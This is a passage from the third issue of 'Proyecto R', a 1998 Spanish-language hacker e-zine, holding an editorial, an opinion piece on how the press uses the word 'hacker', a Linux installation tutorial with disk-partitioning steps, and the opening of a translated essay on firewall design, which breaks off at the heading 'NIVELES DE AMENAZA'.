Proyecto r 03

Martes, 30 de Noviembre de 1999 01:00

Algunas cosillas sobre Firewalls,Conviviendo con Linux,Ataques practicos contra PGP,Chistes , Cuentos y otras Burradas,Algo sobre Seguridad de Redes,Curso de ASM,Jugando con Novell 3.11 vol 0,5,BackDoorS (NewS).....

Texto Completo:

....
.oH*RR$Wx.
x*#"~```"!Rn
z!~ ~@!
xZ~+osem+e. `Mi ��BIENVENIDOS -- BIENVENIDOS!!
$? 'M$$~4$$L `$:
dR WTQ Q$$ !W ~ AL PRIMER MAGAZINE ELECTRONICO ~
*! RN$ $$* `R <>
! !@$ .R$! !k PARA HISPANOAMERICA
'$ $$$oW@# @k
'$ $TR?$$ @F ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'R $WR4$$L $! � �
$L $$R RTN :$~ � >>>-PROYECTO_R--> �
?B $$R `M$: X$ � �
`$: $EN M$W: .*F � "La copia infeliz del Eden" �
!$.+***@.`*!R.!H � @@@@@@@@@@@@@@@@@@@@@@@@@ �
`?NL ```W@" � �
`#$m. .u@#~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~H#tWXW$*"`
``"""""

NUMERO "3"

21 Septiembre de 1998
Junto a Nuestra Primavera nace un nuevo fenomeno

Url : http://prm.home.ml.org
http://www.bigfoot.com/~proyecto_r
http://www.geocities.com/colosseum/sideline/9497

E-Mail :
Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla

Staff Extraoficial (o hasta el momento somos!)

==TAkER==
==AnDyK==
==Mate Swichman==
==PlaXiuS==

Colaboradores de este Numero :

Joel McNamara
Arturo Quirantes Sierra
Francisco Cruz Argudo
Conde Vampiro

SOPORTE 911

Secretaria : Alo soporte .
Computin : Si digame , en que puedo servirle (pa' variar simpre eficiente).
Secretaria : Sabe que , mm es que mmmm tengo un problemita .
Computin : Cuentame !!!
Secretaria : Es el Fax .
Computin : Que pasa con el Fax , no me corresponden esos problemas pero bueno .
Secretaria : Es que mi jefe me pidio mandar un documento .
Computin : Ya ok y cual es el problema .
Secretaria : ES QUE LLEVO MAS DE DOS HORAS ENVIANDO EL DOCUMENTO Y TODAVIA NO SE VA !!!
TODAVIA LO TENGO EN MIS MANOS .. HABRA MUCHO TRAFICO O NO CABRA EN LA
LINEA TELEFONICA ... TRATE DE MANDARLO ENROLLADITO Y TAMPOCO FUNCIONO .
Alo .. Aloo responda pues !!!
Computin : Tuu Tuuu Tuuu ... (Plop) .

Soporte 911 esta dedicado a la ignorancia de la gente !!! Deja de ser un maldito sudaka
subdesarrolado , lee , estudia , instruyete ... . Dedicado a todas las secretarias tontas .
(notese solo a las tontas)

################################# INDICE ###################################
# #
# 1 Editorial .........................................Editor #
# 2 Desconocimiento Total o Puro Sensacionalismo.......Conde Vampiro #
# 3 Algunas cosillas sobre Firewalls...................TAkER #
# 4 Conviviendo con Linux..............................PlaXiuS #
# 5 Ataques practicos contra PGP ......................Arturo Quirantes #
# 6 Chistes , Cuentos y otras Burradas.................VaRioS #
# 7 Algo sobre Seguridad de Redes .....................Francisco Cruz #
# 8 Curso de ASM ......................................AnDyK #
# 9 Jugando con Novell 3.11 vol 0,5....................TAkER #
# 10 BackDoorS (NewS) ..................................Mate Switchman #
# 11 Ha llegado Mail ...................................VaRioS #
# 12 Shutdown ..........................................Proyecto_R #
# 13 Llaves PGP ........................................Proyecto_R #
# #
############################################################################

=============================================================================

~~~~~~~~~~~~~~~~~
# #
# 1.- EDITORIAL #
# #
~~~~~~~~~~~~~~~~~

__________________________________________________________________ By Editor

Hola Terricolas :

Bueno hemos llegado a nuestro tercer numero .. !! Guauu es increible ,
aunque muchos no daban ni un 20 por nosotros , hemos seguido trabajando
duro por este poryecto y aunque aun somos poquitos , y todavia nos hace
falta colaboracion , seguiremos trabajando duro para crecer mas y ser
mejores . Entregar mas informacion a nuestros lectores y de la misma
forma ir aprendiendo al informar .
Nuestro sitio web ha tenido gran cantidad de publico , hasta el momento
un promedio de 5 personas al dia , nada de mal para estar empezando creo
yo , muchos visitantes chilenos nos acompa�an ; cosa que nos alegra
bastante ya que al principio encontramos un poco frio el recibimiento
nacional ... teniamos mas visitas de Espa�a y Mexico , que de nuestro
propio pa�s ... ;(( Pero ya es una etapa superada .. queremos saludar
tambien a todos nuestrso amigo hispanoamericanos que nos leen ,de Mexico
, Espa�a , Colombia , Argentina eTc... gracias a vustras visitas y sus
mails , nos dan ganas de trabajar mas duro aun .!!
Como ya hemos informado en nustra pagian web , pronto daremos informacion
sobre el "Komando API" que se encargara de luchar en contra de la
pornografia infantil en la RED , usaremos mano dura con ellos hee !!!
espero que colaboren todos .- de alguna u otra forma . Siempre habra
alguna forma de eliminar servidores que contengan este tipo de
material .
Queremos que nuestros lectores nos informen sobre grupos hacks que existan
o se esten formando en latinoamerica a ver si podemos servirles como medio
de contacto hehe!!! sin paranoia , que existen los remailers y el PGP .. ahh
verdad eso queria decirles vamos a publicar en esta edicion la llave PGP del
E-Zine que sera la misma llave PGP de editor de turno ... digo editor de turno
por si algun dia no pueda seguir con el proyecto o deba desaparecer
misteriosamente , por si quieres escribirnos algo un poco delicado .. haaa y
hablando de PGP en este numero un sorprendente numero de Ataques Practicos
al PGP , creias que tu PGP era seguro ??? veremos que dices al terminar de leer
el articulo .. tenemos varios proyectos .. como lo hes la distribucion de CD
de Linux gratis , para las personas que habitan en Chile !!!! a ver si a
futuro hacemos buenos contactos en otros paises para expandir la distribucion
, aunque la verdad no veo para que seria mas facil bajarlo de la inet ..
Pero Bueno .... No se abran dado cuenta en el numero dos aparecio una
nueva seccion llamada BacKDoorS , que sera nuestra seccion de noticias .
Creo que este numero ha sido el mejor que hemos sacado .. bueno de los
poquitos numeros que tenemos jejej , pero se ve que esta cosa suma y sigue ,
y tiene para rato .... Asi que continuaremos con nuestro esfuerzo .. y les
aseguro que daremos que hablar en la esena UNDER .

Proyecto_R se hace participe en la luchas que mantienen en este momento
las etnias indigenas de america .... no dejaremos que los gobiernos y los
TODOPODEROSOS aplasten al pueblo indigena . Lo sentimos bastante por
la Prole mexicana que bastante ha sufrido con la represion del gobierno
federal y nos hacemos parte de su dolor . Al pueblo mapuche le prestamos
todo nuestro apoyo , no dejaremos que una maldita empresa los pisotee y
pasen a llevar sus raices ... estaremos con ustedes hasta en las ultimas
consecuencias , y si la situacion se saliera de control ...
ACTUAREMOS CON TODAS NUESTRAS FUERZAS !!! Que nuestros lectores no piensen
que somos aliados politicos , que somos comunistas o cosas por el estilo ,
de hecho no simpatizamos con ningun partido politico ya que son todos unos
CERDOS MENTIROSOS , que del unico bien del cual se preocupan es el de ellos .
Solo nos identificamos con lo que creemos JUSTO !!

Bueno no los aburro mas con el bla bla ... y vamos a la ACCION !!!!

PlaXiuS
El Editor

���������������������������������������������������������������������������

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# #
#�2.-DESCONOCIMIENTO TOTAL O PURO SENSACIONALISMO ? #
# #
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

____________________________________________________________ By Conde Vampiro

En primer lugar saludar a todos los lectores de este nuevo ezine, el
cual les deseo la mejor suerte y que no se rindan, ya que la creacion de un
ezine es de todo menos facil.

Este articulo es una simple opinion referente al mundo de los hackers
y demas historias. Como sabemos siempre que un intruso a sido detenido al
entrar en un sistema informatico ajeno, los medios de prensa ya le ponen el
calificativo de hacker, sin saber ni siquiera si este era un ni�o jugando,
un empleado descontento, etc. Esto logicamente es totalmente erroneo y
provoca la confusion entre la gente. Esto por desgracia este llegando a unos
niveles increibles, por ejemplo, conozco gente que esta estudiando la
carrera de ingenieria informatica pero que los temas de los hackers no les
interesa pero cuando hablan sobre esto lo unico que saben decir es que los
hackers son malos, ya que lo unico que leen sobre los hackers es en los
medios de comunicacion.

Por lo visto poco importa que grupos tan prestigiosos como LOpth,
Boston, EE.UU., hace unas semanas fuese invitado al congreso de los EE.UU.
para mostrar a los senadores como estan las cosas en Internet, logicamente,
enfocandose en la seguridad. Mostraron de como un autentico pirata
informatico con el conocimiento y la habilidad necesaria puede neutralizar
la red Internet en poco tiempo. Al igual como otro grupo muy famoso como es
el CCC (Chaos Computer Club), Hamburgo, Alemania, demostro delante de las
camaras a nivel nacional de como una tecnologia de la conocida empresa
Microsoft podria ser usada para robar informacion o alterar el ordenador
de una persona remotamente para un beneficio propio.

Muchos de la famosos expertos en seguridad, cuando eran jovenes
practicaban el hacking, ya que es uno de los periodos en cualquier experto
en seguridad. Pero a estos famosos nunca vemos como la prensa los machaca o
ni siquiera hablan mal de ellos. Es bien sabido que muchas empresas
contratan hackers para proteger sus sistemas informaticos, entonces, � si
los hackers son malos porque las empresas los contratan, acaso estan
locos. ? No lo creo.

Por eso no ahi nada malo en ser un hacker, refiriendome a una persona
que investiga, mejora las cosas, comparte sus descubrimientos y sobre todo
mejora la calidad de la informatica, en ningun caso un hacker es "aquella
persona que es capaz" de conectar a cualquier pagina web, bajarse
determinados programas y usuarlos para entrar en un servidor ajeno. � Me
pregunto cuantos de estos supuestos hackers saben algo util en realidad. ?

Por supuesto no espero que todo el mundo piense igual que yo, incluso
habra gente que dira que solo estoy diciendo tonterias y puede que lo sea,
pero es la forma de como yo lo veo y es una opinion mas. Por algo pedimos
libertad de expresion. No intento herir la sensibilidad de nadie, como ya
he dicho es mi opinion sencillamente.

Byes all y hasta la vista !!

CONDE VAMPIRO
- J.J.F. / HACKERS TEAM -

�����������������������������������������������������������������������������

~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# #
# 3.-Mi pc y Linux #
# PARTE 1) #
# #
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

__________________________________________________________________ By PlaXiuS

Mucho se ha hablado de este sistema operativo , que realmente vale la pena
tener. El problema de Linux es que aun no tiene el apoyo de las desarrolladoras
de software , pero poco a poco , algunas compa�ias se estan uniendo a este
marvilloso y poderoso sistema operativo . Corel ya ha sacado varios de sus
programas dise�ados para paltaforma Linux y esperamos que otros sigan su
ejemplo . Pero cada dia mas personas instalan linux en su pc , por razones
evidente (ya estan aburridos de que se les cuelgue la maquina o que con cada
parche o actualizacion de software , el pc se ponga mas lento ).

Un poco de Historia :

Bueno , se sabe que UNIX es un sistema operativo bastante potente que soporta
multitarea y tiene una cantidad de opciones increibles .... El gran problema de
UNIX es que es demasiado caro ,y no esta al alcanze de la mayoria de los mortales
, es asi como grupos de hackers Unix , y expertos en programacion se lanzan en la
aventura de crear un nuevo sistema operativo que se asimilara a UNIX , pero que
a diferencia de este no costara ni un duro !!! es asi como Andy Tanenbaum crea
el Minix ; que era un version mas peque�a de UNIX ... Alguien dijo Minilinux !!!
si algo asi .. hee - Fue asi como inspirado en MINIX , Linus Trobalds de la
universidad de Helsinki , Finlandia , dise�o y creo un nuevo sistema operativo
mas potente que MINIX , al cual le llamo "LINUX" una fusion entre el nombre de este
y unix ...
Asi empezo esta aventura a la cual se fueron uniendo mas colaboradores hasta
llegar al nivel actual donde linux es un sistema operativo bastante conocido
y bastante elogiado por los entendidos .... La gracias de linux es que al ser
sus propios usuarios los que ayudan a desarrollarlo y al ser un opens system ..
es decir " que el codigo fuente esta ahi para que tu lo modifiques a tu antojo"
es que linux es mejor soportado y mejor aun mas potenete y eficiente ... hasta
el dia de hoy si quieres hacerte participe de este proyecto ... mas bien dicho
si quieres participar en el mejoramiento y actualizacion del nucleo lo puedes
hacer a travez de Linus T. quien es el encargado de recibir todas las mejoras ,
evaluarlas y actualizar el nucleo ...
Linux es un sistema de libre distribucion , es decir que puedes bajartelo ,
copiarlo , etc... todo gratis .... Si compras una distribucion de linux en
CD no tienes ninguna prohibicion de copiar el software cuantas veces quieras
, Ademas la gran mayoria de los programas desarrollados para Linux tambien
son free o mas bien dicho bajo las reglas GNU del la Free Software Fundation.

Bueno ya te has decidido por fin a instalarte linux ... bueno entonces que
esperamos .
Epezemos por la instalacion de este sistema operativo .

1) Preparando el Disco Duro .
-----------------------------

Si vas a instalar linux en tu pc , tienes que tener en cuenta que necesitas
250 mb para la instalacion de linux y alrededor de 50 mb para la aparticion
Swap . (Nota: necesidades de instalacion para usuarios basicos)

Mucha gente tiene solo un disco duro y querra instalar Linux junto a su DOS
o Win95 . Para esas personas Existe un programita llamado FIPS , que se
encargara de liberar espacio para crear las particiones nativas de LInux y la
particion Swap , sin da�ar la particion de Dos .

Pasos a Seguir .

1.- Copy FIPS.EXE al directorip c:\windows c:\dos .
2.- Crear un disco con sistema (DOS o WIN95) y copiar ahi , el archivo
RESTORRB.EXE que se encuentra en el mismo directorio de donde sacaste
FIPS.EXE (ya sea cd o disco duro ) .
3.- Corre el scandisk y despues el Defrag en tu disco duro , ya que en el
espacio que se libere en esta operacion , fips creara la nueva particion .
4.- Reinicie el equipo en Modo DOS , (no una ventana DOS) .-
5.- Ejecute FIPS.EXE ahi te aparecera un mensaje , preguntandote cual disco
quieres particionar ... si tienes uno solo .. sera uno jejeje.-
6.- Al confirmar el proceso de preguntara si quieres hacer una copia de la
particion actual de tu equipo (por si te lo hechas), colocas el diskette
booteable en el cual copiaste el RESTORRB.EXE y le dices que si (YES) .
7.- Fips ahora mostrara una tabla de particiones , y creara una nueva
dependiendo del espacio libre en el disco . Puedes ajustar el espacio
usando las flechas de tu teclado . Al darle enter te preguntara si el
espacio usado en la nueva particion son correctos presione "c" continue ,
de lo contrario presione "r" de Re-edit .
8.- Ahora fips estara escribiendo la nueva tabla .
9.- Cuando fips termine .. reinicia tu maquina .
10.-Ahora con el Fdisk debes borrar la segunda particion . Linux Fdisk se
encargara mas tarde de crear la Particion nativa y la Swap .

2) Preparando Boot y Root
-------------------------

Redhat es una de las distribuciones de Linux mas usadas , por su facil manejo
e instalcion . Para instalar REDHAT en nuestro pc lo primero que tenemos que
hacer es crear un disco llamado Boot .
Vamos a la practica ... suponiendo que tienes un cd (unidad D:) con Redhat
haremos lo siguiente :

Lo primero que tenemos que hacer es copiar un programita llamado rawrite.exe
desde el CD , normalmente esta en un subdirectorio llamado utils ..

d:\utils>copy rawrite.exe c:\windows

Lo copiamos a windows por lo del path .. pero puede ser cualquier directorio ejm
c:\dos c:\windows\command

Ahora creamos el BooT .-

C:\>d:
D:\>cd images
D:\>images rawrite
Enter disk images source file name : boot.img
Enter target diskette drive : a:
Please insert formatted disk into drive A: and press -Enter-:

En el ejmplo anterior al escribir el comando rawrite , el programa nos
pregunta el nombre de de la imagen que queremos copiar en el diskette , en
este caso el disco BOOT = boot.img .

Si estas instalando tu redhat desde un disco duro , tendras que hacer el
siguienente paso :

C:\>d:
D:\>cd images
D:\>imagesrawrite
Enter disk images source file name : supp.img
Enter target diskette drive : a:
Please insert formatted disk into drive A: and press -Enter-:

Lo que acabamos de realizar es el diskette suplementario para cargar el
Redhat desde una unidad de disco fijo , laptops que requieren soporte para
PCMCIA , etc....

Slackware es una distribucion de Linux bastante conocida (diria que junto a
RedHat son las mas conocidas y mas usadas) y aunque su instalacion no es tan
simple y automatizada como la de RedHat , sigue sindo una forma facil y amistosa
de instalar este fabulosos sistema operativo .

Para esta distribucion de Linux necesitamos dos discos .... un disco Boot y otro
llamado Root .

Vamos por el disco BOOT.

Para realizar este diskette hay varias opciones de como hacerlo o mas bien dicho
varias configuraciones, trataremos de describir algunas configuraciones para
distribuciones mas antiguas por si a alguien le sirve . Los archivos de encuentran
en el siguiente orden ...
Para bootear desde discos de 1.44 tendremos que buscar nuestros archivos en el
directorio D:\bootdsks.144 y para discos de 1.2 (a caso todavia existen) en el
directorio D:\bootdsks.122 , Aun no existe el bootdisk para minidisk :)) jajaja .
Ahora lo que realmente no se .. pero creo haber visto algo en el redhat5.1 es
un autoboot pero , no lo he probado ya que no pude bajar la version completa !!!
si sabes algo ya sabes cuentanos !!!! PREGUNTA PARA NUESTROS LECTORES !!!
existira alguna version de linux que sea capaz de bootearse desde el CD , algo
parecido a lo que hace er Guindoze NT ... !!!! mmmm TAkER tenemos mas trabajo
a averiguar merda !!!!
Bueno despues de esta voladita jeje es que cuando me entretengo en algo no paro
y me dan cuerda .. Es que me apasiona la informatica .. vieran ustedes cuando estoy
haciendo clases ... termino hablando de cualquier cosa menos del tema de la clase :)

Bueno describamos un poquito !!!

las siguientes imagenes pueden venir con extension GZ ..gzip o con extension 1 de
imagen listos para el rawrite ..

Veamos un listadito para una distribucion antigua
**************************************************

bare : Para la instalacion desde disquetes , solo con drivers para discos duros ,
no soporta SCSI , ni redes .

cdu31a : SOn para aquellos que instalaran el slack desde CD de sony , en concreto

cdu31=(cdu31,cdu33) y para cdu535 .

Idecd : Para lectores de CD IDE... no sera medio obvio .

Mitsumi : Para lectores de 2X Mitsumi ..(el que tengo en la casa jaja no me alcanza
para mas y mas encima lo tengo malo ... bueno la controladora esta mala )

Net : Para instalar Linux a travez de la red TCP/IP ... especial para cargas masivas ..
(abra algun soporte IPX ??)
Sbpcd : Soporte para CD de soundblaster ... PANASONIC o Panasonic solo !!

Scsi : Soporte para discos y cd SCSI.

SCSINET : Para discos SCSI y red al mismo tiempo !!!!

Medio engorroso heee !!!! pero bueno como hay genios informaticos con conciencia
colectiva que realmente nos solucionan y nos hacen mas facil la vida ( y por amor
al arte) , en las nuevas versiones de Slackware existen nuevos diskettes de boot ..

VEamos las versiones mas nuevecitas
***********************************

Bare.i : Soporta discos IDE soporta CD ATAPI/IDE , procporciona soporte PPP .

Net.i : Adivina buen adivinador ... para redes pues Ethernet ,!!!

SCSI.i : PAra elememntos SCSI .

SCSINET.i : PAra drivers SCSI y red ethernet

hay varios mas pero los dejaremos para que los estudies tu mismo ..!!! normalente
si estas instalando desde un CD ide utilizaras eL bare.i

Vamos entonces a crear nuestro disco de BOOT .

D:\>cd bootdsks.144
D:\bootdsks>rawrite
Enter disk image source file name : bare.i
Enter target diskette driver : a:
Please insert a formatted disk into dirver A: and press -Enter-:

Ok estamos listo con el Boot .. ahora nos falta el dico de Root .

D:\>cd rootdsks
D:\ROOTDSKS>rawrite
Enter disk image source file name : color.gz -> en algunas versiones
puede ser color144.gz etc..
Enter target diskette driver: a:
Please insert a formatted disk into driver A: and press -Enter-:

y listo tenemos nuestro disko de Boot y Root listoko .. !!!!!

Vamos ahora al ataque ... insertemos el disco de Boot y reiniciemos
nuestra maquina .

3)Comienza el Show ... Donde estan los payasos .. !!!

El redhat tiene la gracia de ser casi completamente automatizado .... dentro
de lo que se puede !!! de hecho como ya lo he mensionado antes es el mas facil
de instalar ... es el a prueba de tontos .. de los linux !!! no se sientan
ofendidos .. ya que al principio fue la unica distribucion que logre instalar ,
y eso que no me meti con el debian .,,,,, pero en principio no existian tantas
guias en espa�ol .. ni faqs en este idioma .. hoy gracias .. a la gente del
proyecto lucas .. y otros tantos .. como los grupos de usuarios de Linux de
Argentina , Uruguay y Mexico que se han dado el trabajo de traducir tremendas
guias y howto de Linux !!!!

Bueno el redhat ba a correr solo un setup y lo primero que te preguntara sera
el tipo de monitor si es color o en blanco y negro . !!ahi eliges tu opcion
y comienza la instalcion .. te preguntara desde donde instalaras el software
y te mostrara varas opciones como .. desde CD , desde disco duro , o desde
NFS (red) .... En este caso vamos a instalarlo desde el cd .. que detectara
solito hee mira que inteligente .. heee nos falta poco para el PLUG AnD FUCK ..
perdon para el plug and play ...( conectar y jugar o usar como prefieras ..
a caso no es lo mismo ) pero si llegaras querer instalar desde el un disco duro
te pedira el disco suplementario .. que tambien sirve para unidades PCMCIA ..
(especial para cargar en nuestro laptop ..) una vez cargado .. te prguntara en
que unidad de disco quieres instalarlo ... la unidades pueden ser las siguientes :

/dev/hda1 para nuestro primer disco IDE .. normalmente el C:
ahora si tenemos una particion extra en este mismo disco duro .. o la creamos con
el fips .. esta unidad se llamaria ..
/dev/hda2

veamos una tablita para que la entiendan mejor !!!

/dev/hda Primer disco IDE
/dev/hdb Segundo disco IDE
/dev/hdc Tercer disco IDE

Seleccionaremos en este caso el disco /dev/hda que correspondera al nuestro disco
c: .. no vamos a matar er Guindoze que mi se�ora me mata ... para eso sirve le FIPS
o no !!!

pero antes de instalarlo tenemos que darle el formato .. o mas bien dicho crearle
la particion adecuada para que linux corra !!!!

para eso seleccionamos la particion y seleccionamos la opcion edit que aparece en el
cuadro ..

aparecera el siguiente cuadro tipo dos ..

Command (m for help):m

Command action
a toggle a bootable flag
d delete a partition
l list known partition types
m print this menu
n add a new partition
p print partition table
q quit without saving changes
t change a patition`s system id
u change display/entry units
v verify the partiton table
w write table to disk and exit
x extra functionality (experts only)

estamos ejecutando el fdisk para linux !!! ....pero vamos a ver que tenemos
en el disco .!!

command (m for help):p

Disk /dev/hda:32heads,63 sectors ,1024 cylinders
units = Cylinders of 1024 * 512 bytes

Device Boot Begin Start End Blocks Id System
/dev/hda * 1 1 49 100160 06 Dos 16-bit >=32M

"Con el comando P , lo que hacemos es imprimir la configuracion en pantalla
P de Print " (no sera mucho lucho).
Bueno crearemos entonces una nueva particion , que correspondera a la particion
swap ...

Command (m for help):n

Command action
e extended
p primary
p <----------------------------le decimos que es una particion primaria
Partition number(1-4):2 <------le decimos la numero 2 ya que la uno ya esta ocupada (DOS).
First cylinder(50-1024):50 <----Obvio le decimos que parta desde el cilindro 50 .
Lasr cylinder or +sizr or +sizeM or +sizeK(54-1024):+16M <--Bueno le decimos en este caso que
ocupe 16 MB de espacio ..
Podrian haber puesto en vez de +16M , +1600K o el numero del ultimo cilindro .. pero sin el signo
(+) .

Ahora crearemos la particion Nativa de Linux ... nuevamente ocupamos el comando n .

Command (m for help):n

Command action
e extended
p primary
p
Partition number(1-4):3
First cylinder(54-1024):54
Lasr cylinder or +sizr or +sizeM or +sizeK(54-1024):1024 <--en este caso le
ponemos el ultimo cilindro para no perder nada !!!

Bueno veamos como esta nuestra tabla de partciones ,, !!!!

Command (m for help):p

Disk /dev/hda:32heads,63 sectors ,1024 cylinders
units = Cylinders of 1024 * 512 bytes

Device Boot Begin Start End Blocks Id System
/dev/hda1 * 1 1 49 100160 06 Dos 16-bit >=32M
/dev/hda2 * 50 50 54 16016 83 Linux Native
/dev/hda3 * 54 54 1024 260160 83 Linux Native

Esta todo bien hasta el momento .. pero tenemos dos particiones nativas de linux ..
y necesitamos una SWAP ... bueno a eso vamos .

Command (m for help):t <--- para cambiar el tipo de particion
Partition number(1-4):2 <--- la particion que queremos cambiar .
Hex code(type L to list codes)82 <---- el tipo de particion que queremos dejar

Bueno al apretar la L nos lista los tipos de particiones que existen .. la particion
Swap corresponde a la id 82 .
Entonces nuestra tabla de particiones deberia quedar asi !!!

Command (m for help):p

Disk /dev/hda:32heads,63 sectors ,1024 cylinders
units = Cylinders of 1024 * 512 bytes

Device Boot Begin Start End Blocks Id System
/dev/hda1 * 1 1 49 100160 06 Dos 16-bit >=32M
/dev/hda2 * 50 50 54 16016 82 Linux Swap
/dev/hda3 * 54 54 1024 260160 83 Linux Native

presionamos entonces la W para escribir los cambio y salir del fdisk .

Command (m for help):w

Entonces la instalcion de redhat nos vuelva al menu de instalacion y elegimos
la particion nativa de linux en este caso /dev/hda3 para instalar ahi el
sistema .

Luego nos preguntara si queremos formatear la particion Swap , por supuesto
le decimos que si ...

Ahora solo sigamos las instrucciones .. que ya lo mas complicado esta listo
el resto dependera del tipo de configuracion que quieras instalar ...
por ejemplo te consultara si quieres ver una particion DOS , montada directamente
en el Linux .. si tener que montarla o desmontarla manualmente en el directorio
/mnt ... . Te preguntara que paquetes de software quieres instalar , y que tipo
de arranque quieres ... LILO .. puedes bootear linux desde un disco de arranque
o si tienes una particion DOS como es este el caso solo debes elegir dentro del
menu de instalacion LILO la particion de arranque en este caso la /dev/hda1

4)El instalar Slackware es bastante parecido aunque cambia lagunas cositas ...

Para comenzar nuestra instalacion debemos bootear con el disco boot que hemos
hecho previamente ... en algun momento nos preguntara o mas bien dicho nos
pedira el diskette de root .. que hemos creado dependiendo de nuestras necesidades
, si recuerdan anteriormente creamos la imagen del bare.i que se adecua a las necesidades
tipicas -.-- disco ide , CD atapi/ide , etc..
instalamos el disco i en algun momento nos mostrara el siguiente promt ..

Bueno ahora tenemos que ejecutar el Fdisk ...

#fdisk
#Command (m for help):

RECUERDAN ESTE MENU , bueno ahora tenemos que crear la particion swap y la particion
nativa de LINUX donde instalaremos nuestro sistema .....
A todo esto he hablado mucho de la particion SWAP de Linux y no he explicado para que
sirve ..:)) sorry !!!jejej .. bueno la particion Swap nos servira como memoria virtual
en Linux ... les suena algo asi como a archivo de intercambio .. de guindoze !!! bueno
es algo parecido .. pero esta particion si funciona .. y cuando cambiemos o actualizemos
el nucleo de linux ...!! no nos dara errores con el archivo de intercambio . perdoonn con
la particion SWAP !!! jejeje .
Bueno una vez creada la particion Swap y nativa de linux ,,!!! empezamos la instalacion ..
para esto solo ponemos

#setup

Bueno el resto de la instalacion es bastante simple y autoexplicativas .. asi que solo
tienes que configurarlas segun tus necesidades . !!!
Bueno ya tenemos instalado Linux ... ahora solo tienes que investigar un poquito bajarte
algunas guias .... etc...

Para el proximo numero hablaremos de los primeros pasos dentro de este sistema operativo.
como crear directorios .. copiar etc.. cosas basicas .. ademas de una introduccion a
XWindows .. y de algunas configuraciones basicas como Slip .. para tu modem , y
configuraciones de perifericos en gral .

Bueno hasta la proxima ..

PlaXiuS

������������������������������������������������������������������������������

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# #
# 4.-Algunas cosillas sobre Firewalls #
# #
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

_______________________________________________________________________ By TAkER

Una pesima traduccion de un documento que me llego via e-mail (Gracias PlaXiuS), el
documento original fue escrito por Marcus J. Ranum.

Abstraccion

Generalmente, a aquel que ocupa el campo de battala primero y espera a su
enemigo las cosas le resultan mas faciles - Sun Tzu

Muchas compa�ias se conectan a Internet protegidas por Firewalls dise�anadas para
prevenir el acceso no autorizado a sus redes privadas. Ademas de esta meta general, los
firewalls dan un espacio continuo entre su facilidad de uso y la seguridad. Este documento
describe algunas de las consideraciones y acciones que hay que tener en cuenta. Se ofrece
un vocabulario acerca de los firewalls y sus componentes, para asi proveer un buen tema de
discusion.

POR QUE UN FIREWALL?
Contra aquellos expertos en el ataque, un enemigo no sabe como defenderse, contra
los expertos en defensa, el enemigo no sabe como atacar - Sun Tzu

La razon fundamental para instalar un firewall es casi siempre proteger una red
privada contra los intrusos. En la mayoria de los casos, el proposito de los firewalls es
prevenir el acceso no autorizado a los recursos computacionales en una red privada, y a
menudo para prevenir la exportacion de informacion. En algunos casos la exportacion de
Informacion no se considera como algo importante, pero para muchas empresas que estan
conectadas esta es una de las razones que mas les preocupa. Muchas Organizaciones tratan
de evitar el problema no conectandose a internet (como si esto fuera una solucion). Esta
solucion puede ser dificil de implementar. Si la red privada es pobremente administrada o
descentralizada, una sola dependencia de la empresa con un modem de alta velocidad puede
efectuar una coneccion SLIP con Internet la cual puede comprometer la seguridad de toda la
red.

Frecuentemente es seguro decir que el firewall necesita ser colocado en el lugar
para el factor "CYA" ("Cover Your Assets" o en spanish "Cuida tu patrimonio"). Sin embargo,
un empleado puede comprometer la informacion guardandola en DAT's o disquettes y llevandola
fuera de la empresa, El internetrepresenta una amenaza tangible, poblada con peligrosos
"Vandalos" (es esi como nos llama..???, y encima dice: "Los vandalos fueron un grupo de
tribus de rudos barbaros que saquearon Roma en 455 y se llevaron todo lo que podian
cargar. Algunos usan el termino "hackers" para describirlos, pero seria mejor el de
VANDALOS, CRACKERS, JERKS, huyyyyy creo que se paso este se�or..!!!!), Seria muy facil
para un administrador de redes perder su trabajo si ocurre una incursion de este caso,
igual si la infiltracion se dio a traves de una conexion por linea telefonica o por un
empleado descontento. Generalmente para un sitio Internet, las dificultades tecnicas para
la implementacion de firewalls son sobredimensionadas por el problema de vender la idea a
las gerencias de alto grado.

DECISIONES DE DISE�O
Examine su ambiente - Mitamoto Musashi

En la configuracion de un firewall, las desiciones de dise�o son mayores en cuanto
a lo que se refiere la seguridad ya que estas ya han sido dictadas por la empresa o por la
politica organizacional; especificamente, una decision debe ser tomada teniendo en cuenta
que la seguridad es mas importante que la facilidad de uso, o viceversa. Aqui hay dos
planteamientos basicos que generalizan el conflicto:

- Lo que no esta expresamente permitido es prohibido.
- Lo que no esta expresamente prohibido es permitido.

A la importancia de esta distincion no se le puede dar mucho enfasis. En el caso
anterior, el firewall debe ser dise�adopara bloquear todo, y los servicios deben ser
habilitados en cada caso fundamentado este solo despues de una cuidadosa evaluacion de
necesidades y riesgos. Esto tiende a afectar directamente a los usuarios, y ellos pueden
ver el firewall como un obstaculo. En el segundo caso, el administrador del sistema se
coloca en un modo reactivo, teniendo que predecir que tipo de acciones pueden hacer los
usuarios que puedan debilitar la seguridad del fierwall, y preparar las defensas contra
esas acciones. Esto generalmente pone al administrador del firewall en contra de los
usuarios en una lucha sin fin que puede volverse muy peligrosa. Un usuario generalmente
puede comprometer la seguridad de su Login si no estan advertidos ni se han puesto a
pensar en las razones del porque es necesaria la seguridad. Si el usuario tiene abierto
un acceso en el sistema del firewall mismo, esto puede resultar en una seria brecha de
seguridad. La presencia de Logins de usuarios en el sistema del firewall tiende a
agrandar el problema de mantenimiento de la integridad del sistema. La segunda politica
esta implicita en la frase "Aquello que no esta expresamente permitido es prohibido". Esta
es mas segura ante fallas, desde que el administrador acepte que ignora que puertos TCP
son seguros, o cuales agujeros pueden existir en el Kernel de las aplicaciones del
fabricante (esto si que es dificil, todos los administradores creen que lo saben todo,
juaaaaaaa). Dado que muchos de los vendedores son lentos para publicar los agujeros de
seguridad de sus productos (y ahora Wipo Bill...empeora las cosas), esto claramente se
vuelve un planteamiento mas conservador. Es admitible el hecho de que no sabes que puede
da�arte.

NIVELES DE AMENAZA
